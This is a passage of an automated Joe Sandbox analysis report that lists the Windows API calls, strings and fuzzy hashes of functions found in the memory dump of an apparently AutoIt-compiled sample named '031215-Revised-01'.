                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: ee57853fbdb747f88e1f3ba67d13df4838f66f905d88e50cf4e2d160a4266687
                                        • Instruction ID: 751c95507a3614033c48a7ad6164cb308fda765ca6ff934bb8400b97f4d4bb81
                                        • Opcode Fuzzy Hash: ee57853fbdb747f88e1f3ba67d13df4838f66f905d88e50cf4e2d160a4266687
                                        • Instruction Fuzzy Hash: AEF0C8355056006BC26227FDBC06F9F269ABFC37A1F254538F824965D3EF64884156A1
                                        APIs
                                          • Part of subcall function 00089639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00089693
                                          • Part of subcall function 00089639: SelectObject.GDI32(?,00000000), ref: 000896A2
                                          • Part of subcall function 00089639: BeginPath.GDI32(?), ref: 000896B9
                                          • Part of subcall function 00089639: SelectObject.GDI32(?,00000000), ref: 000896E2
                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00108A4E
                                        • LineTo.GDI32(?,00000003,00000000), ref: 00108A62
                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00108A70
                                        • LineTo.GDI32(?,00000000,00000003), ref: 00108A80
                                        • EndPath.GDI32(?), ref: 00108A90
                                        • StrokePath.GDI32(?), ref: 00108AA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: c5e8c2aae3447f6a9ef96f71aca2a238b4391ed3ffd9a5ff9cc2ce8724f59bc0
                                        • Instruction ID: deac18f49d420ab813253f2ccb5f648ac87f89cbacfa21b9a89468ddc69a160f
                                        • Opcode Fuzzy Hash: c5e8c2aae3447f6a9ef96f71aca2a238b4391ed3ffd9a5ff9cc2ce8724f59bc0
                                        • Instruction Fuzzy Hash: 3B111E7600010CFFEF119F90DC88EAA7F6CEB04354F048111FA59965A1C7B19D95DFA0
                                        APIs
                                        • GetDC.USER32(00000000), ref: 000D5218
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 000D5229
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000D5230
                                        • ReleaseDC.USER32(00000000,00000000), ref: 000D5238
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 000D524F
                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 000D5261
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: a30e0a37fc16584d6cd2c79bd9b08b419880160021f905d4fac6c2eb12d1557c
                                        • Instruction ID: 365846fe4f2660d7d7f4c8069c0b937429ede736e580904d2a9420f27f96e539
                                        • Opcode Fuzzy Hash: a30e0a37fc16584d6cd2c79bd9b08b419880160021f905d4fac6c2eb12d1557c
                                        • Instruction Fuzzy Hash: 8301A275E00708BBEB109BA59C49F5EBFB8EF48351F048166FA04A7381D6709C04CFA0
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00071BF4
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00071BFC
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00071C07
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00071C12
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00071C1A
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00071C22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: e11daf01b1266d4ffb413bda48faccaec43ca0e7dfbb155b6ba3cd985739000d
                                        • Instruction ID: a518da9e2afb4820abe64af39d2a65d470563fd3276723c212b94078b0d478ec
                                        • Opcode Fuzzy Hash: e11daf01b1266d4ffb413bda48faccaec43ca0e7dfbb155b6ba3cd985739000d
                                        • Instruction Fuzzy Hash: F3016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47A41C7F5A864CFE5
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000DEB30
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000DEB46
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 000DEB55
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000DEB64
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000DEB6E
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000DEB75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: f0c7aaa7227582a67cb4dbd006626fef3d14c3034e6868a336eca911deefd547
                                        • Instruction ID: 7de246f2fd2647ea83fa315586831dacdcba62e179cee4a659d9f25695d61b7b
                                        • Opcode Fuzzy Hash: f0c7aaa7227582a67cb4dbd006626fef3d14c3034e6868a336eca911deefd547
                                        • Instruction Fuzzy Hash: 89F09A72200258BBE7205B629C0EEEF3A7CEFCAB11F000259F641D1190E7E11A41CEF4
                                        APIs
                                        • GetClientRect.USER32(?), ref: 000C7452
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 000C7469
                                        • GetWindowDC.USER32(?), ref: 000C7475
                                        • GetPixel.GDI32(00000000,?,?), ref: 000C7484
                                        • ReleaseDC.USER32(?,00000000), ref: 000C7496
                                        • GetSysColor.USER32(00000005), ref: 000C74B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID:
                                        • API String ID: 272304278-0
                                        • Opcode ID: e9d1e402404cf9921d1ee3ab5ccf1ba5c8c5729bb8a9d2cc2bd9f943b1e36984
                                        • Instruction ID: 07835df4edf98d059a24f79d09a6a0818f20e30cb1f7f6423fde8cf28ef7e1b2
                                        • Opcode Fuzzy Hash: e9d1e402404cf9921d1ee3ab5ccf1ba5c8c5729bb8a9d2cc2bd9f943b1e36984
                                        • Instruction Fuzzy Hash: 68018B31500205EFDB605F64DC08FEEBBB6FB04321F100264FA59A25A0CF711E81AF90
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D187F
                                        • UnloadUserProfile.USERENV(?,?), ref: 000D188B
                                        • CloseHandle.KERNEL32(?), ref: 000D1894
                                        • CloseHandle.KERNEL32(?), ref: 000D189C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 000D18A5
                                        • HeapFree.KERNEL32(00000000), ref: 000D18AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        • Opcode ID: 2744387a037fda3d1ee8a87e48e9bd98ddc79674c1e2d133e422925910b27894
                                        • Instruction ID: a6936eb94975adba3fe8d8b812550aef2f0ad49aa717fb75b1b74f77b6956fc8
                                        • Opcode Fuzzy Hash: 2744387a037fda3d1ee8a87e48e9bd98ddc79674c1e2d133e422925910b27894
                                        • Instruction Fuzzy Hash: D2E0C236004101FBDA015BA1ED0C90ABB39FB4DB22B108320F2A5858B0CBB294A0DF90
                                        APIs
                                          • Part of subcall function 00077620: _wcslen.LIBCMT ref: 00077625
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000DC6EE
                                        • _wcslen.LIBCMT ref: 000DC735
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000DC79C
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000DC7CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default
                                        • String ID: 0
                                        • API String ID: 1227352736-4108050209
                                        • Opcode ID: a58a31ff47f15be5e5c28e322e5b3d463d14aef065b5f43713608484809531c1
                                        • Instruction ID: aed26ca9cd8e183c52bfc152edf71325757b790e19d2f1cacff1af5d7a901d09
                                        • Opcode Fuzzy Hash: a58a31ff47f15be5e5c28e322e5b3d463d14aef065b5f43713608484809531c1
                                        • Instruction Fuzzy Hash: 1A51B0716083029BE7A49F28C885FAB77E4AF45314F040A2EF995D32E1DB74D944DF62
                                        APIs
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 000FAEA3
                                          • Part of subcall function 00077620: _wcslen.LIBCMT ref: 00077625
                                        • GetProcessId.KERNEL32(00000000), ref: 000FAF38
                                        • CloseHandle.KERNEL32(00000000), ref: 000FAF67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                        • String ID: <$@
                                        • API String ID: 146682121-1426351568
                                        • Opcode ID: 85149cf1ce876a442180f5cb7016a9de5b0568585fe373d3502a9f8e37059178
                                        • Instruction ID: 52e968d6cca134f2e76165639f0dfd64cdc5388a863c2d150febbb34514dd2dc
                                        • Opcode Fuzzy Hash: 85149cf1ce876a442180f5cb7016a9de5b0568585fe373d3502a9f8e37059178
                                        • Instruction Fuzzy Hash: 78718B70A00619DFCB14DF64C484AAEBBF0FF09310F0484A9E85AAB762C774ED45CB91
                                        APIs
                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000D7206
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000D723C
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000D724D
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000D72CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: 9331b2efe5a1049f79bccaf3d3f2b40a343ae851f3da8281f06b17cdbe2acbbf
                                        • Instruction ID: a06c91a517154c61818150808e23b7b757601b669010fd6fb2522861d8202179
                                        • Opcode Fuzzy Hash: 9331b2efe5a1049f79bccaf3d3f2b40a343ae851f3da8281f06b17cdbe2acbbf
                                        • Instruction Fuzzy Hash: CF413F71A04304EFDB25CF54C885AAA7BA9EF44310F1481AEBD099F34AE7B5D945CBB0
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00103E35
                                        • IsMenu.USER32(?), ref: 00103E4A
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00103E92
                                        • DrawMenuBar.USER32 ref: 00103EA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert
                                        • String ID: 0
                                        • API String ID: 3076010158-4108050209
                                        • Opcode ID: bef59324f0a8a19bf05e8d14e230295a6a1c50f45f1f9c0b58a91ffddb6324a0
                                        • Instruction ID: 830c8b010114fcba68b3f891d9c942b2ccc2606422920d65a7f3e384efa70300
                                        • Opcode Fuzzy Hash: bef59324f0a8a19bf05e8d14e230295a6a1c50f45f1f9c0b58a91ffddb6324a0
                                        • Instruction Fuzzy Hash: 3B413B75A01209EFDB10DF50D884EEABBB9FF49354F044229F99597290D7B0AE45CF90
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000D1E66
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000D1E79
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 000D1EA9
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen$ClassName
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 2081771294-1403004172
                                        • Opcode ID: c23f19641fdd6013ad63352fb46749866fe5c4f4d22e8bf4d233a9a7dbf63b52
                                        • Instruction ID: 2a6025d2fb9941b2e2ed963a557f36e6273feff6751a948a944cb651947527b8
                                        • Opcode Fuzzy Hash: c23f19641fdd6013ad63352fb46749866fe5c4f4d22e8bf4d233a9a7dbf63b52
                                        • Instruction Fuzzy Hash: FD212971A00204BEDB14AB64DC46CFFB7B9EF45354B14411AF815A72E2DF7949468B70
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: HKEY_LOCAL_MACHINE$HKLM
                                        • API String ID: 176396367-4004644295
                                        • Opcode ID: a5d0f7b092590d3b814ebdd58371ef5c3e8672a268c2bd91240125a630138c2c
                                        • Instruction ID: 47e516a017ec2ee90f9cab2568854bf01f4122f54312bf514109043741de40f5
                                        • Opcode Fuzzy Hash: a5d0f7b092590d3b814ebdd58371ef5c3e8672a268c2bd91240125a630138c2c
                                        • Instruction Fuzzy Hash: 47314B73A0016D4BEB70DF2C8B53CBE33D15BA1758F054019E9056BA45EA71ED80F3A2
                                        APIs
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00102F8D
                                        • LoadLibraryW.KERNEL32(?), ref: 00102F94
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00102FA9
                                        • DestroyWindow.USER32(?), ref: 00102FB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                        • String ID: SysAnimate32
                                        • API String ID: 3529120543-1011021900
                                        • Opcode ID: fa7f54da953fadf90206fde5ba92bf06463172d14758f91dc6458023001cb4c6
                                        • Instruction ID: 29ae5405e373f2db4e628cfa558fc6815ada86ae0835d52acec2edd9f7222bb4
                                        • Opcode Fuzzy Hash: fa7f54da953fadf90206fde5ba92bf06463172d14758f91dc6458023001cb4c6
                                        • Instruction Fuzzy Hash: D121C07120020AABEB215F64DC88FBB77BDEB593A4F104618F990D31D0D7B1DC919B60
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00094D1E,000A28E9,?,00094CBE,000A28E9,001388B8,0000000C,00094E15,000A28E9,00000002), ref: 00094D8D
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00094DA0
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00094D1E,000A28E9,?,00094CBE,000A28E9,001388B8,0000000C,00094E15,000A28E9,00000002,00000000), ref: 00094DC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: f323b552b80345d643143d367a2c9639cc12b39f7c6de96cad85044eff34434c
                                        • Instruction ID: 40b73d566a1e018c0a9dd42274cbe22fb117953cc4b829d05e807f5fc5844f89
                                        • Opcode Fuzzy Hash: f323b552b80345d643143d367a2c9639cc12b39f7c6de96cad85044eff34434c
                                        • Instruction Fuzzy Hash: 2EF0AF38A00208BBDB159F90DC49BEDBBF4EF48712F0001A8F849A26A0DBB059C1DFD1
                                        APIs
                                        • LoadLibraryA.KERNEL32 ref: 000CD3AD
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000CD3BF
                                        • FreeLibrary.KERNEL32(00000000), ref: 000CD3E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: GetSystemWow64DirectoryW$X64
                                        • API String ID: 145871493-2590602151
                                        • Opcode ID: 820d921c63c8c8dcaa5acafb19983e29432d2c0323dbaf7b025faf65caf55a69
                                        • Instruction ID: 8763ad3e11730dc4731eb38f1df08d803b26cceb0f3d4ce11d62bb049f15c82e
                                        • Opcode Fuzzy Hash: 820d921c63c8c8dcaa5acafb19983e29432d2c0323dbaf7b025faf65caf55a69
                                        • Instruction Fuzzy Hash: 03F02071806621ABD7B127208C28F6E7760BF21701F65826FF486F2091DBB0CE808BC2
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00074EDD,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E9C
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00074EAE
                                        • FreeLibrary.KERNEL32(00000000,?,?,00074EDD,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074EC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-3689287502
                                        • Opcode ID: 804ce552be072d4af514d68f09594e7b791dc061def6060fecd7a027ddebcdc4
                                        • Instruction ID: 1beec165f3e67058a60ec2b8f703b7caaea5ef23162a9d15412374cf09f2f4bb
                                        • Opcode Fuzzy Hash: 804ce552be072d4af514d68f09594e7b791dc061def6060fecd7a027ddebcdc4
